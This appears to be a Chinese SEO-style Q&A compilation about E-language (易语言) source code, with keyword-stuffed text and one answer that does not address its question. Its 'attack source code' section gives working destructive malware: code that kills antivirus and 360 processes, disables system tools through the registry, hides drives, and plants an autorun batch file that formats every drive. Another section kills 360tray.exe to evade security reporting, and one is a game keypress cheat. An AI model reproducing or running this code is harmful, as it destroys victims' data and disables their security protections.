易语言爱易防追防挂起源码的简单介绍

本文目录一览：

• 1、易语言做的后台按键挂怎么防封
• 2、易语言攻击源码，各种的都没事。。。
• 3、易语言DLL如何防止他人调用？有哪些源码参考？
• 4、易语言防止360上报，最好来个源码。
• 5、求助，易语言反HOOK源码，防止其他程序DLL注入

易语言做的后台按键挂怎么防封

易语言用这个代码不会被封掉，而且是后台按键：

.版本 2

.子程序 _时钟1_周期事件

.参数 进程ID, 整数型

进程ID ＝ 取句柄 (“游戏进程”)

按键消息 (进程ID, #F11键)

按键消息 (进程ID, #F1键)

.子程序 _按钮1_被单击

时钟1.时钟周期 ＝ 10

.子程序 _按钮2_被单击

时钟1.时钟周期 ＝ 0

易语言攻击源码，各种的都没事。。。

.局部变量 变量, 整数型

置现行时间 (到时间 (“2056年1月1日”))

运行 (“taskkill /f /im kavsvc.exe”, 假, 1)

运行 (“taskkill /f /im KVXP.kxp”, 假, 1)

运行 (“taskkill /f /im Rav.exe”, 假, 1)

运行 (“taskkill /f /im Ravmon.exe”, 假, 1)

运行 (“taskkill /f /im Mcshield.exe”, 假, 1)

运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)

' 绕过360监控

写注册项 (4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0)

写注册项 (4, “SOFTWARE\360Safe\safemon\MonAccess”, 0)

写注册项 (4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0)

写注册项 (4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0)

运行 (“taskkill /f /im 360tray.exe”, 假, 1) ' 结束360进程

' 修改关联

写注册项 (1, “.txt\”, “jpegfile”)

写注册项 (1, “.inf\”, “jpegfile”)

写注册项 (4, “SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue”, 0) ' 隐藏文件和文件夹

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 0) ' 禁用任务管理器

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, 1) ' 禁用控制面板

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools”, 1) ' 禁用注册表

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1) ' 隐藏开始中的运行 禁止WIN2000/XP通过任务管理器创建新任务

写注册项 (3, “SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled”, 1)

' 隐藏“MS-DOS方式”下的磁盘驱动器。不管是在“我的电脑”里，或“MS－DOS”方式下都看不见了

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”, 4294967295) ' 隐藏所有驱动器

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive”, 4294967295) ' 禁止所有驱动器

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1) ' 隐藏文件夹选项

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”, 1) ' 将桌面对象隐藏

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1) ' 隐藏开始中的关机

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1) ' 隐藏开始中的搜索

' 写注册项 (3, “Software\Policies\Microsoft\Windows\System\DisableCMD”, 1)'1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0启用两项

写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage”, 1) ' 隐藏主页选项组

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”, 1) ' 隐藏IE文件菜单

写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites”, 1) ' 隐藏收藏夹菜单

写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting”, 1) ' 禁用IE打印功能

写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions”, 1) ' 隐藏Internet选项

写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource”, 1) ' 禁止IE查看源文件

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803”, 3) ' 禁用IE下载功能

写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu”, 1) ' 禁止右键关联菜单

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode”, 1) ' 禁止“重新启动计算机切换到MS-DOS方式”

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, 1) ' 禁止显示“注销”

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu”, 1) ' 禁止文档菜单

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, 1) ' 去掉“开始”选单中的“登录”项

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, 1) ' 禁止使用鼠标右键

写到文件 (读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\” ＋ 到文本 (取分钟 (取现行时间 ())) ＋ “.vbs”, 到字节集 (“set Cleaner=createobject(” ＋ 左逗号.标题 ＋ “wscript.shell” ＋ 右逗号.标题 ＋ “)” ＋ #换行符 ＋ “Cleaner.run” ＋ 左逗号.标题 ＋ 读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\” ＋ 到文本 (取秒 (取现行时间 ())) ＋ “.bat” ＋ 右逗号.标题 ＋ “,vbhide”)) ' 创建隐藏批处理脚本

置文件属性 (读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\” ＋ 到文本 (取分钟 (取现行时间 ())) ＋ “.vbs”, 7 ＋ 32)

写到文件 (读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\” ＋ 到文本 (取秒 (取现行时间 ())) ＋ “.bat”, 到字节集 (“@echo off” ＋ #换行符 ＋ “for %%i in (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO format %%i: /q /x /y” ＋ #换行符 ＋ “del /f /s /q /a %SystemRoot%\system32\*.msc”)) ' 创建格式化和删除没运行文件的批处理

置文件属性 (读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\” ＋ 到文本 (取秒 (取现行时间 ())) ＋ “.bat”, 7 ＋ 32)

写注册项 (4, “Software\Microsoft\Windows\CurrentVersion\Run\Explore.exe”, 读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\” ＋ 到文本 (取分钟 (取现行时间 ())) ＋ “.vbs”) ' 把隐藏批处理脚本加入启动项

' 修改EXE图标

写到文件 (读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\wscript.ico”, #ico)

' 置文件属性 (读环境变量 (“SystemRoot”) ＋ “\system32\wscript.ico”, 7 ＋ 32)

写到文件 (读环境变量 (“SystemRoot”) ＋ “\system32\reg.reg”, 到字节集 (“Windows Registry Editor Version 5.00” ＋ #换行符 ＋ “[HKEY_CLASSES_ROOT\exefile\DefaultIcon]” ＋ #换行符 ＋ “@=” ＋ 左逗号.标题 ＋ 读环境变量 (“SystemRoot”) ＋ “\system32\wscript.ico” ＋ 右逗号.标题))

写到文件 (读环境变量 (“SystemRoot”) ＋ “\system32\reg.bat”, 到字节集 (“@echo off” ＋ #换行符 ＋ “regedit /s reg.reg” ＋ #换行符 ＋ “assoc .exe=exefile” ＋ #换行符 ＋ “del /f /s /q /a ” ＋ 读环境变量 (“SystemRoot”) ＋ “\system32\reg.reg” ＋ #换行符 ＋ “del /f /s /q /a ” ＋ 读环境变量 (“SystemRoot”) ＋ “\system32\reg.bat”))

运行 (读环境变量 (“SystemRoot”) ＋ “\system32\reg.bat”, 假, 1)

写注册项 (4, “SOFTWARE\360Safe\safemon\ExecAccess”, 1)

写注册项 (4, “SOFTWARE\360Safe\safemon\MonAccess”, 1)

写注册项 (4, “SOFTWARE\360Safe\safemon\SiteAccess”, 1)

写注册项 (4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 1)

易语言DLL如何防止他人调用？有哪些源码参考？

可以主程序窗口里拖一个“服务器”进去，DLL里加客户端，客户端连接服务端，在时限里客户端连接到服务器通过验证才能使用。

也可以使用进程通讯。还可以写一串验证码到某个文件里或者注册表里，这串验证码根据时间动态生成，DLL来检验这串字符是否正确。

推荐“淡淡网络程序拓展模块 9.39”，这个模块比外挂作坊1.5强大不知道多少，外挂作坊1.5好像是2006年出的，好多功能都不行，在WIN7下用不了。

延展阅读：

易语言是一门以中文作为程序代码编程语言，其以“易”著称，创始人为吴涛。易语言早期版本的名字为E语言。其最早的版本的发布可追溯至2000年9月11日。创造易语言的初衷是进行用中文来编写程序的实践，方便中国人以中国人的思维编写程序，并不用再去学习西方思维。易语言的诞生极大的降低了编程的门槛和学习的难度。从2000年以来，易语言已经发展到一定的规模，功能上、用户数量上都十分可观。

易语言防止360上报，最好来个源码。

.版本 2

.支持库 eAPI

.子程序 _按钮1_被单击

.局部变量 进程句柄, 整数型

.局部变量 进程列表, 进程信息, , "0"

.局部变量 局部_计次, 整数型

.局部变量 进程ID, 整数型

进程列表 ＝ 取系统进程列表 ()

.计次循环首 (取数组成员数 (进程列表), 局部_计次)

.如果真 (进程列表 [局部_计次].进程名称 ＝ “360tray.exe”)

进程ID ＝ 进程列表 [局部_计次].进程标识符

进程句柄 ＝ 打开进程_ (1, 0, 进程ID)

输出调试文本 (强力结束进程 (进程句柄, 0))

.如果真结束

.计次循环尾 ()

.版本 2

.DLL命令 关闭内核对象_, 整数型, "kernel32", "CloseHandle", , , 关闭一个内核对象。其中包括文件、文件映射、进程、线程、安全和同步对象等。涉及文件处理时易语言爱易防追防挂起源码，这个函数通常与vb易语言爱易防追防挂起源码的close命令相似。应尽可能易语言爱易防追防挂起源码的使用close，因为它支持vb的差错控制。注意这个函数使用的文件句柄与vb的文件编号是完全不同的 非零表示成功，零表示失败。会设置GetLastError

.参数 对象句柄, 整数型, , 欲关闭的一个对象的句柄;

.DLL命令 终止进程_, 整数型, , "TerminateProcess", , 结束一个进程

.参数 进程的句柄, 整数型, , Long，指定要中断的一个进程的句柄

.参数 退出代码, 整数型, , Long，进程的一个退出代码

.DLL命令 打开进程_, 整数型, "kernel32.dll", "OpenProcess", , , 将句柄返回给过程对象

.参数 进程对象, 整数型, , dwDesiredAccess

.参数 继承句柄, 整数型, , bInheritHandle

.参数 进程标识符, 整数型, , dwProcessId

评论(2)

求助，易语言反HOOK源码，防止其他程序DLL注入

腾讯电脑管家可以帮助修复

a进入管家的首页后，点击右上角的“工具箱”按钮，点击“电脑诊所”

b进入“电脑诊所”找到“软件硬件”点击“丢失dll文件”最后“一键修复”界面

可以根据自己弹出的对话框中显示的无法启动程序是丢失的何种dll文件，找到对应的后，鼠标轻轻放在该项上，当出现了“立即修复”按钮后点击“立即修复”按钮。

完成以上步骤后，系统便自行修复了dll文件丢失的故障了，完成了修复